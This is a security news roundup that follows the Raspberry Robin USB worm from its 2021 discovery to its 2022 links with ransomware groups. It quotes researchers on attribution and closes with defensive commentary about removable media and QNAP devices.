Updated on 2022-11-23
The Sophos X-Ops team has a thread and IOCs on recent Raspberry Robin attacks.
NEW: On a recent threat hunt, our MDR team uncovered multiple Raspberry Robin infections using a DLL spreader.
The USB worm was first spotted in Sept 2021 by Red Canary. Back then, its purpose wasn’t clear. Since then, it’s spread – a lot.
— Sophos X-Ops (@SophosXOps) November 21, 2022
Updated on 2022-10-28: Raspberry Robin malware linked to ransomware attacks
In a report on Thursday, Microsoft was able to finally confirm that in some cases, systems infected with the Raspberry Robin USB worm were used as entry points for hands-on-keyboard ransomware attacks—and more specifically, with the Clop ransomware strain. In addition, Microsoft also confirmed IBM X-Force’s findings that the Raspberry Robin malware was developed by the EvilCorp gang, the same group that created the Dridex banking trojan and the Locky and BitPaymer ransomware strains. Read more:
- Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity
- Raspberry Robin and Dridex: Two Birds of a Feather
Updated on 2022-10-27
Microsoft found that almost 3,000 devices in 1,000 organizations have suffered a Raspberry Robin payload-related alert in the last 30 days.
Update on 2022-09-26: Raspberry Robin activity surge
Update on 2022-08-05: Raspberry Robin
Microsoft said on Friday that they’d seen instances where the new Raspberry Robin malware has deployed second-stage malware known as FakeUpdates/SocGholish.
The DEV-0206 and DEV-0243 partnership remains strong with the recent DEV-0206-associated deployment of FakeUpdates via existing Raspberry Robin infections, followed by DEV-0243 pre-ransomware behavior. More about this development in the RaaS ecosystem: https://t.co/g1sA0YddnM
— Microsoft Security Intelligence (@MsftSecIntel) July 28, 2022
In the eyes of several security experts, this is a worrying event as the SocGholish operation has been previously used to drop ransomware inside corporate networks in the past.
Okay, backing up MS:
Raspberry Robin USB worm -> Tor traffic as above -> SocGholish -> ransomware group.
MS call it FakeUpdates but I don't think it's great name, as it is not a fake update – it's the SocGholish RAT framework.
— Kevin Beaumont (@GossiTheDog) July 29, 2022
More from Katie Nickels, Director of Intelligence at Red Canary, the security firm that initially discovered and documented the Raspberry Robin malware earlier this year.
“Many organizations have observed and publicly discussed Raspberry Robin’s initial execution behaviors, but there remained a major gap in that no one seems to have observed any later-stage activity—like an eventual payload. Microsoft’s finding that Raspberry Robin has deployed malware called FakeUpdates/SocGholish is an interesting development. Microsoft is certainly credible, but we can’t independently verify their claim at this time.
Raspberry Robin itself is an activity cluster that we created based on observed behaviors in multiple different environments. We continue to see Raspberry Robin activity, but we have not been able to associate it with any specific person, company, entity, or country. Ultimately, it’s too early to say if Evil Corp is responsible for, or associated with, Raspberry Robin. The Ransomware-as-a-Service (RaaS) ecosystem is a complex one, where different criminal groups partner with one another to achieve a variety of objectives. As a result, it can be difficult to untangle the relationships between malware families and observed activity.
Microsoft’s findings suggest that the adversaries behind Raspberry Robin may have some kind of relationship with DEV-0206 and DEV-0243, two groups tracked by Microsoft, but the exact nature of that relationship is unclear. Red Canary has not directly observed Raspberry Robin spreading SocGholish/FakeUpdates, nor are we aware of any clear connection to Evil Corp, DEV-0206, or DEV-0243, but we’re watching to see if more evidence emerges to solidify these relationships or if they were simply one-time occurrences.”
Update on 2022-07-15: Raspberry Robin
Cybereason researchers have published a technical report on the Raspberry Robin malware, which uses LNK files to infect its victims and is usually delivered through file archives, removable devices (USB), or ISO files. According to Cybereason, the majority of victims are located in Europe. A report on the same malware is also available from Red Canary.
Update on 2022-07-10: Raspberry Robin continues to spread
Microsoft told customers in a security alert last week to bolster their defenses against the Raspberry Robin malware, as the company has found infections with this new threat on the networks of hundreds of customers. Discovered by Red Canary last year, Raspberry Robin is a Windows worm that spreads through USB devices and often uses hacked QNAP NAS devices as command-and-control servers.
Overview: Raspberry Robin Spreads Via External Drives
Analysts from Red Canary have detected a worm that spreads via external USB drives. Dubbed Raspberry Robin, the malware uses Microsoft Standard Installer to communicate with its command-and-control infrastructure, which is largely made up of compromised QNAP devices.
- Even if you aren’t interested in this particular malware, read it for a nice example on how to provide actionable information about detecting this type of malware and the particular techniques being used will likely be found in other malware as well.
- Am I the only one who thought this was a Raspberry Pi issue? Not so much. This is the loaded media problem; once again your QNAP devices are in the cross hairs. This reminds us to not allow autoplay on removable media, only use trusted media, and ideally, scan it before inserting it into system components. Note that NGAV systems tend to not perform disk scanning, they scan when files are opened, so you need a separate process for that.